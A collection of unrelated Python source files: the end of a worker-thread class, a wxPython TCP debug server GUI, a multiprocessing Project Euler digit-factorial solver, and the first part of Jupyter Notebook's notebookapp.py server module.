self.logger.debug("Stopping worker thread")
self._exit_event.set()
def _run(self):
self.logger.debug("Worker thread commencing.")
while not self._exit_event.is_set():
workflow = pop_from_queue()
if workflow is not None:
self.logger.info("Starting processing of workflow '{0}'"
.format(workflow.path.stem))
workflow.process()
self.logger.info("Starting output generation of workflow '{0}'"
.format(workflow.path.stem))
workflow.output()
time.sleep(1)
self.logger.debug("Thread has finished")
|
tcp_server_gui.py
|
#!/usr/bin/env python
"""
Copyright (c) 2012, Bruce A. Corliss
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are met:
* Redistributions of source code must retain the above copyright
notice, this list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above copyright
notice, this list of conditions and the following disclaimer in the
documentation and/or other materials provided with the distribution.
* Neither the name of the BACETech Consulting nor the
names of its contributors may be used to endorse or promote products
derived from this software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL Bruce A. Corliss BE LIABLE FOR ANY
DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
(INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""
import wx
import os
import shutil
import socket
import sys
import time
import socket
import atexit
import threading
# Global Variables
tcp_socket = None
tcp_conn = None
listen_thread = None
listen_thread_pid = None
# Parameters
ID_START = wx.NewId()
ID_STOP = wx.NewId()
# Define notification event for thread completion
EVT_RESULT_ID = wx.NewId()
CMD_DELIM = ';'
MSG_DELIM = ';;'
BUFFER_SIZE = 1024
APP_W = 700
APP_H = 350
PAD=10
class TextFrame(wx.Frame):
def __init__(self):
""" Initialize tcp server gui."""
wx.Frame.__init__(self, None, -1, 'Zen Controller Debug Server', size=(APP_W , APP_H))
# Add panel
self.panel = wx.Panel(self, wx.ID_ANY)
# TCP Connection Objects
self.hostAddress_text = wx.StaticText(self.panel, -1, "IP Address", pos=(10,10))
self.hostAddress_edit = wx.TextCtrl(self.panel, -1, "127.0.0.1", pos=(100, 10), size=(75, 15))
self.hostPort_text = wx.StaticText(self.panel, -1, "Port", pos=(10, 25), size=(20,20))
self.hostPort_edit = wx.TextCtrl(self.panel, -1, "22500", pos=(100, 25), size=(75, 15))
self.startserver_toggle = wx.ToggleButton(self.panel, -1, "Start Server", pos=(200, 8), size=(100,35))
# Command input
self.output_text = wx.StaticText(self.panel, -1, "Output", pos=(10,50))
self.output_edit = wx.TextCtrl(self.panel, -1,"",size=(APP_W - 3*PAD, 200),
style=wx.TE_MULTILINE, pos=(PAD,70))
self.output_edit.SetEditable(False)
# Callbacks
self.startserver_toggle.Bind(wx.EVT_TOGGLEBUTTON, self.StartServer_Callback, self.startserver_toggle)
# Recieve timer
self.recieve_timer = wx.Timer(self)
self.Bind(wx.EVT_TIMER, self.TcpAcceptConnection, self.recieve_timer)
def StartServer_Callback(self, event):
""" Starts or stops acting as tcp server."""
global listen_thread
global listen_thread_pid
global tcp_socket
global tcp_conn
if self.startserver_toggle.GetValue():
self.LogThis("Starting server...")
self.startserver_toggle.SetLabel("Stop Server")
self.TcpServerConnect()
# Start new thread for listening
listen_thread = threading.Thread(target=self.TcpAcceptConnection)
listen_thread.setDaemon(True)
listen_thread.start()
else:
self.LogThis("Stopping server...")
self.startserver_toggle.SetLabel("Start Server")
# Close tcp connection if it exists
if tcp_conn is not None: tcp_conn.close()
if tcp_socket is not None: tcp_socket.close()
# Terminate listen thread if it exists
if listen_thread is not None and listen_thread.isAlive():
self.LogThis("Killing listen_thread: {0}".format(listen_thread_pid))
os.popen("kill -9 " + str(listen_thread_pid))
try: listen_thread._Thread__stop()
except: self.LogThis('Listen thread could not be terminated')
tcp_conn = None
tcp_socket = None
def TcpServerConnect(self):
""" Initialize tcp connection for server"""
global tcp_socket
global tcp_conn
# Initialize tcp socket
tcp_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.LogThis("Binding and listening: " + self.hostAddress_edit.GetLabel() +
": " + self.hostPort_edit.GetLabel())
tcp_socket.bind((self.hostAddress_edit.GetLabel(), int(self.hostPort_edit.GetLabel())))
tcp_socket.listen(1)
def TcpAcceptConnection(self):
""" Monitors connection, collects message in buffer until message sent, responds, repeats."""
global tcp_socket
global tcp_conn
global listen_thread_pid
# Get PID
listen_thread_pid = os.getpid()
self.LogThis("Waiting for client connection...")
tcp_conn, addr = tcp_socket.accept()
self.LogThis("Client address: " + "".join(str(addr)))
while True:
msg_buffer = ''
while True:
if not self.startserver_toggle.GetValue(): return
wx.Yield()
self.LogThis("Waiting for client message...")
msg_buffer += tcp_conn.recv(BUFFER_SIZE)
if msg_buffer.find(MSG_DELIM) >= 0:
self.LogThis("Client:\t " + msg_buffer)
# Send RECIEVE
self.LogThis("Server:\t " + "RECIEVED" + MSG_DELIM)
tcp_conn.sendall("RECIEVED" + MSG_DELIM)
# Send DONE to terminate message group
self.LogThis("Server:\t " + "DONE" + MSG_DELIM)
tcp_conn.sendall("DONE" + MSG_DELIM)
break
time.sleep(.5)
def LogThis(self, output_str):
print output_str
self.output_edit.AppendText("\n" + output_str)
self.output_edit.ShowPosition(self.output_edit.GetLastPosition())
self.output_edit.Refresh()
def main():
app = wx.PySimpleApp()
frame = TextFrame()
frame.Show()
app.MainLoop()
if __name__ == "__main__":
main()
|
034 - digit factorials.py
|
#!python3
# coding: utf-8
# 145 is a curious number, as 1! + 4! + 5! = 1 + 24 + 120 = 145.
# Find the sum of all numbers which are equal to the sum of the factorial of their digits.
# Note: As 1! = 1 and 2! = 2 are not sums they are not included.
#https://projecteuler.net/problem=34
from time import perf_counter
from math import factorial
from typing import List
from multiprocessing import Process, Queue, cpu_count
def timed(function):
"decorator for time performance of function"
def wrapper(*args, **kwargs):
start = perf_counter()
value = function(*args, **kwargs)
finish = perf_counter()
fname = function.__name__
print(f"\n{fname} function took {finish - start:.2f} seconds")
return value
return wrapper
def isSumOfFactorials(n, factorial_table):
"returns True if n is sum of factorials of its digits"
sumofFact = 0
for digit in str(n):
sumofFact += factorial_table[int(digit)]
return sumofFact == n
def sumOfmagicnumbers2(lower, upper, factorial_table, que) -> int:
"returns sum of numbers lower and upper that are \
sum of factorial of their digits, including 1 and 2"
sum_of_numbers = 0
for i in range(lower, upper):
if isSumOfFactorials(i, factorial_table):
sum_of_numbers += i
que.put(sum_of_numbers)
@timed
def main():
factorial_table = {}
for i in range(10):
factorial_table[i] = factorial(i)
limit = 1_000_000 #mathematically upper bound
sizeOfSlice = limit//cpu_count()
slices = []
for i in range(cpu_count()):
slices.append([sizeOfSlice*i, sizeOfSlice*(i+1)])
que = Queue()
#assuming 4 processors
p1 = Process(target=sumOfmagicnumbers2, args=(slices[0][0], slices[0][1], factorial_table, que))
p2 = Process(target=sumOfmagicnumbers2, args=(slices[1][0], slices[1][1], factorial_table, que))
p3 = Process(target=sumOfmagicnumbers2, args=(slices[2][0], slices[2][1], factorial_table, que))
p4 = Process(target=sumOfmagicnumbers2, args=(slices[3][0], slices[3][1], factorial_table, que))
processes = [p1, p2, p3, p4]
for proces in processes:
proces.start()
total = 0
for proces in processes:
total += que.get()
proces.join()
print("\nSum of the numbers:", total-3) #subtract for 1 and 2 factorials
if __name__ == "__main__":
main()
|
notebookapp.py
|
"""A tornado based Jupyter notebook server."""
# Copyright (c) Jupyter Development Team.
# Distributed under the terms of the Modified BSD License.
import notebook
import asyncio
import binascii
import datetime
import errno
import functools
import gettext
import hashlib
import hmac
import importlib
import inspect
import io
import ipaddress
import json
import logging
import mimetypes
import os
import random
import re
import select
import signal
import socket
import stat
import sys
import tempfile
import threading
import time
import warnings
import webbrowser
try:
import resource
except ImportError:
# Windows
resource = None
from base64 import encodebytes
from jinja2 import Environment, FileSystemLoader
from notebook.transutils import trans, _
# check for tornado 3.1.0
try:
import tornado
except ImportError as e:
raise ImportError(_("The Jupyter Notebook requires tornado >= 5.0")) from e
try:
version_info = tornado.version_info
except AttributeError as e:
raise ImportError(_("The Jupyter Notebook requires tornado >= 5.0, but you have < 1.1.0")) from e
if version_info < (5,0):
raise ImportError(_("The Jupyter Notebook requires tornado >= 5.0, but you have %s") % tornado.version)
from tornado import httpserver
from tornado import ioloop
from tornado import web
from tornado.httputil import url_concat
from tornado.log import LogFormatter, app_log, access_log, gen_log
if not sys.platform.startswith('win'):
from tornado.netutil import bind_unix_socket
from notebook import (
DEFAULT_NOTEBOOK_PORT,
DEFAULT_STATIC_FILES_PATH,
DEFAULT_TEMPLATE_PATH_LIST,
__version__,
)
from .base.handlers import Template404, RedirectWithParams
from .log import log_request
from .services.kernels.kernelmanager import MappingKernelManager, AsyncMappingKernelManager
from .services.config import ConfigManager
from .services.contents.manager import ContentsManager
from .services.contents.filemanager import FileContentsManager
from .services.contents.largefilemanager import LargeFileManager
from .services.sessions.sessionmanager import SessionManager
from .gateway.managers import GatewayKernelManager, GatewayKernelSpecManager, GatewaySessionManager, GatewayClient
from .auth.login import LoginHandler
from .auth.logout import LogoutHandler
from .base.handlers import FileFindHandler
from traitlets.config import Config
from traitlets.config.application import catch_config_error, boolean_flag
from jupyter_core.application import (
JupyterApp, base_flags, base_aliases,
)
from jupyter_core.paths import jupyter_config_path
from jupyter_client import KernelManager
from jupyter_client.kernelspec import KernelSpecManager
from jupyter_client.session import Session
from nbformat.sign import NotebookNotary
from traitlets import (
Any, Dict, Unicode, Integer, List, Bool, Bytes, Instance,
TraitError, Type, Float, observe, default, validate
)
from ipython_genutils import py3compat
from jupyter_core.paths import jupyter_runtime_dir, jupyter_path
from notebook._sysinfo import get_sys_info
from ._tz import utcnow, utcfromtimestamp
from .utils import (
check_pid,
pathname2url,
run_sync,
unix_socket_in_use,
url_escape,
url_path_join,
urldecode_unix_socket_path,
urlencode_unix_socket,
urlencode_unix_socket_path,
urljoin,
)
from .traittypes import TypeFromClasses
# Check if we can use async kernel management
try:
from jupyter_client import AsyncMultiKernelManager
async_kernel_mgmt_available = True
except ImportError:
async_kernel_mgmt_available = False
# Tolerate missing terminado package.
try:
from .terminal import TerminalManager
terminado_available = True
except ImportError:
terminado_available = False
#-----------------------------------------------------------------------------
# Module globals
#-----------------------------------------------------------------------------
_examples = """
jupyter notebook # start the notebook
jupyter notebook --certfile=mycert.pem # use SSL/TLS certificate
jupyter notebook password # enter a password to protect the server
"""
#-----------------------------------------------------------------------------
# Helper functions
#-----------------------------------------------------------------------------
def random_ports(port, n):
"""Generate a list of n random ports near the given port.
The first 5 ports will be sequential, and the remaining n-5 will be
randomly selected in the range [port-2*n, port+2*n].
"""
for i in range(min(5, n)):
yield port + i
for i in range(n-5):
yield max(1, port + random.randint(-2*n, 2*n))
def load_handlers(name):
"""Load the (URL pattern, handler) tuples for each component."""
mod = __import__(name, fromlist=['default_handlers'])
return mod.default_handlers
#-----------------------------------------------------------------------------
# The Tornado web application
#-----------------------------------------------------------------------------
class NotebookWebApplication(web.Application):
def __init__(self, jupyter_app, kernel_manager, contents_manager,
session_manager, kernel_spec_manager,
config_manager, extra_services, log,
base_url, default_url, settings_overrides, jinja_env_options):
settings = self.init_settings(
jupyter_app, kernel_manager, contents_manager,
session_manager, kernel_spec_manager, config_manager,
extra_services, log, base_url,
default_url, settings_overrides, jinja_env_options)
handlers = self.init_handlers(settings)
if settings['autoreload']:
log.info('Autoreload enabled: the webapp will restart when any Python src file changes.')
super().__init__(handlers, **settings)
def init_settings(self, jupyter_app, kernel_manager, contents_manager,
session_manager, kernel_spec_manager,
config_manager, extra_services,
log, base_url, default_url, settings_overrides,
jinja_env_options=None):
_template_path = settings_overrides.get(
"template_path",
jupyter_app.template_file_path,
)
if isinstance(_template_path, py3compat.string_types):
_template_path = (_template_path,)
template_path = [os.path.expanduser(path) for path in _template_path]
jenv_opt = {"autoescape": True}
jenv_opt.update(jinja_env_options if jinja_env_options else {})
env = Environment(loader=FileSystemLoader(template_path), extensions=['jinja2.ext.i18n'], **jenv_opt)
sys_info = get_sys_info()
# If the user is running the notebook in a git directory, make the assumption
# that this is a dev install and suggest to the developer `npm run build:watch`.
base_dir = os.path.realpath(os.path.join(__file__, '..', '..'))
dev_mode = os.path.exists(os.path.join(base_dir, '.git'))
nbui = gettext.translation('nbui', localedir=os.path.join(base_dir, 'notebook/i18n'), fallback=True)
env.install_gettext_translations(nbui, newstyle=False)
if dev_mode:
DEV_NOTE_NPM = """It looks like you're running the notebook from source.
If you're working on the Javascript of the notebook, try running
%s
in another terminal window to have the system incrementally
watch and build the notebook's JavaScript for you, as you make changes.""" % 'npm run build:watch'
log.info(DEV_NOTE_NPM)
if sys_info['commit_source'] == 'repository':
# don't cache (rely on 304) when working from master
version_hash = ''
else:
# reset the cache on server restart
version_hash = datetime.datetime.now().strftime("%Y%m%d%H%M%S")
if jupyter_app.ignore_minified_js:
log.warning(_("""The `ignore_minified_js` flag is deprecated and no longer works."""))
log.warning(_("""Alternatively use `%s` when working on the notebook's Javascript and LESS""") % 'npm run build:watch')
warnings.warn(_("The `ignore_minified_js` flag is deprecated and will be removed in Notebook 6.0"), DeprecationWarning)
now = utcnow()
root_dir = contents_manager.root_dir
home = py3compat.str_to_unicode(os.path.expanduser('~'), encoding=sys.getfilesystemencoding())
if root_dir.startswith(home + os.path.sep):
# collapse $HOME to ~
root_dir = '~' + root_dir[len(home):]
# Use the NotebookApp logger and its formatting for tornado request logging.
log_function = functools.partial(
log_request, log=log, log_json=jupyter_app.log_json)
settings = dict(
# basics
log_function=log_function,
base_url=base_url,
default_url=default_url,
template_path=template_path,
static_path=jupyter_app.static_file_path,
static_custom_path=jupyter_app.static_custom_path,
static_handler_class = FileFindHandler,
static_url_prefix = url_path_join(base_url,'/static/'),
static_handler_args = {
# don't cache custom.js
'no_cache_paths': [url_path_join(base_url, 'static', 'custom')],
},
version_hash=version_hash,
ignore_minified_js=jupyter_app.ignore_minified_js,
# rate limits
iopub_msg_rate_limit=jupyter_app.iopub_msg_rate_limit,
iopub_data_rate_limit=jupyter_app.iopub_data_rate_limit,
rate_limit_window=jupyter_app.rate_limit_window,
# authentication
cookie_secret=jupyter_app.cookie_secret,
login_url=url_path_join(base_url,'/login'),
login_handler_class=jupyter_app.login_handler_class,
logout_handler_class=jupyter_app.logout_handler_class,
password=jupyter_app.password,
xsrf_cookies=True,
disable_check_xsrf=jupyter_app.disable_check_xsrf,
allow_remote_access=jupyter_app.allow_remote_access,
local_hostnames=jupyter_app.local_hostnames,
authenticate_prometheus=jupyter_app.authenticate_prometheus,
# managers
kernel_manager=kernel_manager,
contents_manager=contents_manager,
session_manager=session_manager,
kernel_spec_manager=kernel_spec_manager,
config_manager=config_manager,
# handlers
extra_services=extra_services,
# Jupyter stuff
started=now,
# place for extensions to register activity
# so that they can prevent idle-shutdown
last_activity_times={},
jinja_template_vars=jupyter_app.jinja_template_vars,
nbextensions_path=jupyter_app.nbextensions_path,
websocket_url=jupyter_app.websocket_url,
mathjax_url=jupyter_app.mathjax_url,
mathjax_config=jupyter_app.mathjax_config,
shutdown_button=jupyter_app.quit_button,
config=jupyter_app.config,
config_dir=jupyter_app.config_dir,
allow_password_change=jupyter_app.allow_password_change,
server_root_dir=root_dir,
jinja2_env=env,
terminals_available=terminado_available and jupyter_app.terminals_enabled,
)
# allow custom overrides for the tornado web app.
settings.update(settings_overrides)
return settings
def init_handlers(self, settings):
"""Load the (URL pattern, handler) tuples for each component."""
# Order matters. The first handler to match the URL will handle the request.
handlers = []
# load extra services specified by users before default handlers
for service in settings['extra_services']:
handlers.extend(load_handlers(service))
handlers.extend(load_handlers('notebook.tree.handlers'))
handlers.extend([(r"/login", settings['login_handler_class'])])
handlers.extend([(r"/logout", settings['logout_handler_class'])])
handlers.extend(load_handlers('notebook.files.handlers'))
handlers.extend(load_handlers('notebook.view.handlers'))
handlers.extend(load_handlers('notebook.notebook.handlers'))
handlers.extend(load_handlers('notebook.nbconvert.handlers'))
handlers.extend(load_handlers('notebook.bundler.handlers'))
handlers.extend(load_handlers('notebook.kernelspecs.handlers'))
handlers.extend(load_handlers('notebook.edit.handlers'))
handlers.extend(load_handlers('notebook.services.api.handlers'))
handlers.extend(load_handlers('notebook.services.config.handlers'))
handlers.extend(load_handlers('notebook.services.contents.handlers'))
handlers.extend(load_handlers('notebook.services.sessions.handlers'))
handlers.extend(load_handlers('notebook.services.nbconvert.handlers'))
handlers.extend(load_handlers('notebook.services.security.handlers'))
handlers.extend(load_handlers('notebook.services.shutdown'))
handlers.extend(load_handlers('notebook.services.kernels.handlers'))
handlers.extend(load_handlers('notebook.services.kernelspecs.handlers'))
handlers.extend(settings['contents_manager'].get_extra_handlers())
# If gateway mode is enabled, replace appropriate handlers to perform redirection
if GatewayClient.instance().gateway_enabled:
# for each handler required for gateway, locate its pattern
# in the current list and replace that entry...
gateway_handlers = load_handlers('notebook.gateway.handlers')
for i, gwh in enumerate(gateway_handlers):
for j, h in enumerate(handlers):
if gwh[0] == h[0]:
handlers[j] = (gwh[0], gwh[1])
break
handlers.append(
(r"/nbextensions/(.*)", FileFindHandler, {
'path': settings['nbextensions_path'],
'no_cache_paths': ['/'], # don't cache anything in nbextensions
}),
)
handlers.append(
(r"/custom/(.*)", FileFindHandler, {
'path': settings['static_custom_path'],
'no_cache_paths': ['/'], # don't cache anything in custom
})
)
# register base handlers last
handlers.extend(load_handlers('notebook.base.handlers'))
# set the URL that will be redirected from `/`
handlers.append(
(r'/?', RedirectWithParams, {
'url' : settings['default_url'],
'permanent': False, # want 302, not 301
})
)
# prepend base_url onto the patterns that we match
new_handlers = []
for handler in handlers:
pattern = url_path_join(settings['base_url'], handler[0])
new_handler = tuple([pattern] + list(handler[1:]))
new_handlers.append(new_handler)
# add 404 on the end, which will catch everything that falls through
new_handlers.append((r'(.*)', Template404))
return new_handlers
def last_activity(self):
"""Get a UTC timestamp for when the server last did something.
Includes: API activity, kernel activity, kernel shutdown, and terminal
activity.
"""
sources = [
self.settings['started'],
self.settings['kernel_manager'].last_kernel_activity,
]
try:
sources.append(self.settings['api_last_activity'])
except KeyError:
pass
try:
sources.append(self.settings['terminal_last_activity'])
except KeyError:
pass
sources.extend(self.settings['last_activity_times'].values())
return max(sources)
class NotebookPasswordApp(JupyterApp):
"""Set a password for the notebook server.
Setting a password secures the notebook server
and removes the need for token-based authentication.
"""
description = __doc__
def _config_file_default(self):
return os.path.join(self.config_dir, 'jupyter_notebook_config.json')
def start(self):
from .auth.security import set_password
set_password(config_file=self.config_file)
self.log.info("Wrote hashed password to %s" % self.config_file)
def shutdown_server(server_info, timeout=5, log=None):
"""Shutdown a notebook server in a separate process.
*server_info* should be a dictionary as produced by list_running_servers().
Will first try to request shutdown using /api/shutdown .
On Unix, if the server is still running after *timeout* seconds, it will
send SIGTERM. After another timeout, it escalates to SIGKILL.
Returns True if the server was stopped by any means, False if stopping it
failed (on Windows).
"""
from tornado import gen
from tornado.httpclient import AsyncHTTPClient, HTTPClient, HTTPRequest
from tornado.netutil import Resolver
url = server_info['url']
pid = server_info['pid']
resolver = None
# UNIX Socket handling.
if url.startswith('http+unix://'):
# This library doesn't understand our URI form, but it's just HTTP.
url = url.replace('http+unix://', 'http://')
class UnixSocketResolver(Resolver):
def initialize(self, resolver):
self.resolver = resolver
def close(self):
self.resolver.close()
@gen.coroutine
def resolve(self, host, port, *args, **kwargs):
raise gen.Return([
(socket.AF_UNIX, urldecode_unix_socket_path(host))
])
resolver = UnixSocketResolver(resolver=Resolver())
req = HTTPRequest(url + 'api/shutdown', method='POST', body=b'', headers={
'Authorization': 'token ' + server_info['token']
})
if log: log.debug("POST request to %sapi/shutdown", url)
AsyncHTTPClient.configure(None, resolver=resolver)
HTTPClient(AsyncHTTPClient).fetch(req)
# Poll to see if it shut down.
for _ in range(timeout*10):
if not check_pid(pid):
if log: log.debug("Server PID %s is gone", pid)
return True
time.sleep(0.1)
if sys.platform.startswith('win'):
return False
if log: log.debug("SIGTERM to PID %s", pid)
os.kill(pid, signal.SIGTERM)
# Poll to see if it shut down.
for _ in range(timeout * 10):
if not check_pid(pid):
if log: log.debug("Server PID %s is gone", pid)
return True
time.sleep(0.1)
if log: log.debug("SIGKILL to PID %s", pid)
os.kill(pid, signal.SIGKILL)
return True # SIGKILL cannot be caught
class NbserverStopApp(JupyterApp):
version = __version__
description="Stop currently running notebook server."
port = Integer(DEFAULT_NOTEBOOK_PORT, config=True,
help="Port of the server to be killed. Default %s" % DEFAULT_NOTEBOOK_PORT)
sock = Unicode(u'', config=True,
help="UNIX socket of the server to be killed.")
def parse_command_line(self, argv=None):
super().parse_command_line(argv)
if self.extra_args:
try:
self.port = int(self.extra_args[0])
except ValueError:
# self.extra_args[0] was not an int, so it must be a string (unix socket).
self.sock = self.extra_args[0]
def shutdown_server(self, server):
return shutdown_server(server, log=self.log)
def _shutdown_or_exit(self, target_endpoint, server):
print("Shutting down server on %s..." % target_endpoint)
server_stopped = self.shutdown_server(server)
if not server_stopped and sys.platform.startswith('win'):
# the pid check on Windows appears to be unreliable, so fetch another
# list of servers and ensure our server is not in the list before
# sending the wrong impression.
servers = list(list_running_servers(self.runtime_dir))
if server not in servers:
server_stopped = True
if not server_stopped:
sys.exit("Could not stop server on %s" % target_endpoint)
@staticmethod
def _maybe_remove_unix_socket(socket_path):
try:
os.unlink(socket_path)
except (OSError, IOError):
pass
def start(self):
servers = list(list_running_servers(self.runtime_dir))
if not servers:
self.exit("There are no running servers (per %s)" % self.runtime_dir)
for server in servers:
if self.sock:
sock = server.get('sock', None)
if sock and sock == self.sock:
self._shutdown_or_exit(sock, server)
# Attempt to remove the UNIX socket after stopping.
self._maybe_remove_unix_socket(sock)
return
elif self.port:
port = server.get('port', None)
if port == self.port:
self._shutdown_or_exit(port, server)
return
else:
current_endpoint = self.sock or self.port
print(
"There is currently no server running on {}".format(current_endpoint),
file=sys.stderr
)
print("Ports/sockets currently in use:", file=sys.stderr)
for server in servers:
print(" - {}".format(server.get('sock') or server['port']), file=sys.stderr)
self.exit(1)
class NbserverListApp(JupyterApp):
version = __version__
description=_("List currently running notebook servers.")
flags = dict(
jsonlist=({'NbserverListApp': {'jsonlist': True}},
_("Produce machine-readable JSON list output.")),
json=({'NbserverListApp': {'json': True}},
_("Produce machine-readable JSON object on each line of output.")),
)
jsonlist = Bool(False, config=True,
help=_("If True, the output will be a JSON list of objects, one per "
"active notebook server, each with the details from the "
"relevant server info file."))
json = Bool(False, config=True,
help=_("If True, each line of output will be a JSON object with the "
"details from the server info file. For a JSON list output, "
"see the NbserverListApp.jsonlist configuration value"))
def start(self):
serverinfo_list = list(list_running_servers(self.runtime_dir))
if self.jsonlist:
print(json.dumps(serverinfo_list, indent=2))
elif self.json:
for serverinfo in serverinfo_list:
print(json.dumps(serverinfo))
else:
print("Currently running servers:")
for serverinfo in serverinfo_list:
url = serverinfo['url']
if serverinfo.get('token'):
url = url + '?token=%s' % serverinfo['token']
print(url, "::", serverinfo['notebook_dir'])
#-----------------------------------------------------------------------------
# Aliases and Flags
#-----------------------------------------------------------------------------
flags = dict(base_flags)
flags['no-browser']=(
{'NotebookApp' : {'open_browser' : False}},
_("Don't open the notebook in a browser after startup.")
)
flags['pylab']=(
{'NotebookApp' : {'pylab' : 'warn'}},
_("DISABLED: use %pylab or %matplotlib in the notebook to enable matplotlib.")
)
flags['no-mathjax']=(
{'NotebookApp' : {'enable_mathjax' : False}},
"""Disable MathJax
MathJax is the javascript library Jupyter uses to render math/LaTeX. It is
very large, so you may want to disable it if you have a slow internet
connection, or for offline use of the notebook.
When disabled, equations etc. will appear as their untransformed TeX source.
"""
)
flags['allow-root']=(
{'NotebookApp' : {'allow_root' : True}},
_("Allow the notebook to be run from root user.")
)
flags['autoreload'] = (
{'NotebookApp': {'autoreload': True}},
"""Autoreload the webapp
Enable reloading of the tornado webapp and all imported Python packages
when any changes are made to any Python src files in Notebook or
extensions.
"""
)
# Add notebook manager flags
flags.update(boolean_flag('script', 'FileContentsManager.save_script',
'DEPRECATED, IGNORED',
'DEPRECATED, IGNORED'))
aliases = dict(base_aliases)
aliases.update({
'ip': 'NotebookApp.ip',
'port': 'NotebookApp.port',
'port-retries': 'NotebookApp.port_retries',
'sock': 'NotebookApp.sock',
'sock-mode': 'NotebookApp.sock_mode',
'transport': 'KernelManager.transport',
'keyfile': 'NotebookApp.keyfile',
'certfile': 'NotebookApp.certfile',
'client-ca': 'NotebookApp.client_ca',
'notebook-dir': 'NotebookApp.notebook_dir',
'browser': 'NotebookApp.browser',
'pylab': 'NotebookApp.pylab',
'gateway-url': 'GatewayClient.url',
})
#-----------------------------------------------------------------------------
# NotebookApp
#-----------------------------------------------------------------------------
class NotebookApp(JupyterApp):
name = 'jupyter-notebook'
version = __version__
description = _("""The Jupyter HTML Notebook.
This launches a Tornado based HTML Notebook Server that serves up an HTML5/Javascript Notebook client.""")
examples = _examples
aliases = aliases
flags = flags
classes = [
KernelManager, Session, MappingKernelManager, KernelSpecManager,
ContentsManager, FileContentsManager, NotebookNotary,
GatewayKernelManager, GatewayKernelSpecManager, GatewaySessionManager, GatewayClient,
]
if terminado_available: # Only necessary when terminado is available
classes.append(TerminalManager)
flags = Dict(flags)
aliases = Dict(aliases)
subcommands = dict(
list=(NbserverListApp, NbserverListApp.description.splitlines()[0]),
stop=(NbserverStopApp, NbserverStopApp.description.splitlines()[0]),
password=(NotebookPasswordApp, NotebookPasswordApp.description.splitlines()[0]),
)
_log_formatter_cls = LogFormatter
_json_logging_import_error_logged = False
log_json = Bool(False, config=True,
help=_('Set to True to enable JSON formatted logs. '
'Run "pip install notebook[json-logging]" to install the '
'required dependent packages. Can also be set using the '
'environment variable JUPYTER_ENABLE_JSON_LOGGING=true.')
)
@default('log_json')
def _default_log_json(self):
"""Get the log_json value from the environment."""
return os.getenv('JUPYTER_ENABLE_JSON_LOGGING', 'false').lower() == 'true'
@validate('log_json')
def _validate_log_json(self, proposal):
# If log_json=True, see if the json_logging package can be imported and
# override _log_formatter_cls if so.
value = proposal['value']
if value:
try:
import json_logging
self.log.debug('initializing json logging')
json_logging.init_non_web(enable_json=True)
self._log_formatter_cls = json_logging.JSONLogFormatter
except ImportError:
# If configured for json logs and we can't do it, log a hint.
# Only log the error once though.
if not self._json_logging_import_error_logged:
self.log.warning(
'Unable to use json logging due to missing packages. '
'Run "pip install notebook[json-logging]" to fix.'
)
self._json_logging_import_error_logged = True
value = False
return value
@default('log_level')
def _default_log_level(self):
return logging.INFO
@default('log_datefmt')
def _default_log_datefmt(self):
"""Exclude date from default date format"""
return "%H:%M:%S"
@default('log_format')
def _default_log_format(self):
"""override default log format to include time"""
return u"%(color)s[%(levelname)1.1s %(asctime)s.%(msecs).03d %(name)s]%(end_color)s %(message)s"
ignore_minified_js = Bool(False,
config=True,
help=_('Deprecated: Use minified JS file or not, mainly use during dev to avoid JS recompilation'),
)
# file to be opened in the notebook server
file_to_run = Unicode('', config=True)
# Network related information
allow_origin = Unicode('', config=True,
help="""Set the Access-Control-Allow-Origin header
Use '*' to allow any origin to access your server.
Takes precedence over allow_origin_pat.
"""
)
allow_origin_pat = Unicode('', config=True,
help="""Use a regular expression for the Access-Control-Allow-Origin header
Requests from an origin matching the expression will get replies with:
Access-Control-Allow-Origin: origin
where `origin` is the origin of the request.
Ignored if allow_origin is set.
"""
)
allow_credentials = Bool(False, config=True,
help=_("Set the Access-Control-Allow-Credentials: true header")
)
allow_root = Bool(False, config=True,
help=_("Whether to allow the user to run the notebook as root.")
)
use_redirect_file = Bool(True, config=True,
help="""Disable launching browser by redirect file
For versions of notebook > 5.7.2, a security feature measure was added that
prevented the authentication token used to launch the browser from being visible.
This feature makes it difficult for other users on a multi-user system from
running code in your Jupyter session as you.
However, some environments (like Windows Subsystem for Linux (WSL) and Chromebooks),
launching a browser using a redirect file can lead the browser failing to load.
This is because of the difference in file structures/paths between the runtime and
the browser.
Disabling this setting to False will disable this behavior, allowing the browser
to launch by using a URL and visible token (as before).
"""
)
autoreload = Bool(False, config=True,
help= ("Reload the webapp when changes are made to any Python src files.")
)
default_url = Unicode('/tree', config=True,
help=_("The default URL to redirect to from `/`")
)
ip = Unicode('localhost', config=True,
help=_("The IP address the notebook server will listen on.")
)
@default('ip')
def _default_ip(self):
"""Return localhost if available, 127.0.0.1 otherwise.
On some (horribly broken) systems, localhost cannot be bound.
"""
s = socket.socket()
try:
s.bind(('localhost', 0))
except socket.error as e:
self.log.warning(_("Cannot bind to localhost, using 127.0.0.1 as default ip\n%s"), e)
return '127.0.0.1'
else:
s.close()
return 'localhost'
@validate('ip')
def _validate_ip(self, proposal):
value = proposal['value']
if value == u'*':
value = u''
return value
custom_display_url = Unicode(u'', config=True,
help=_("""Override URL shown to users.
Replace actual URL, including protocol, address, port and base URL,
with the given value when displaying URL to the users. Do not change
the actual connection URL. If authentication token is enabled, the
token is added to the custom URL automatically.
This option is intended to be used when the URL to display to the user
cannot be determined reliably by the Jupyter notebook server (proxified
or containerized setups for example).""")
)
port_env = 'JUPYTER_PORT'
port_default_value = DEFAULT_NOTEBOOK_PORT
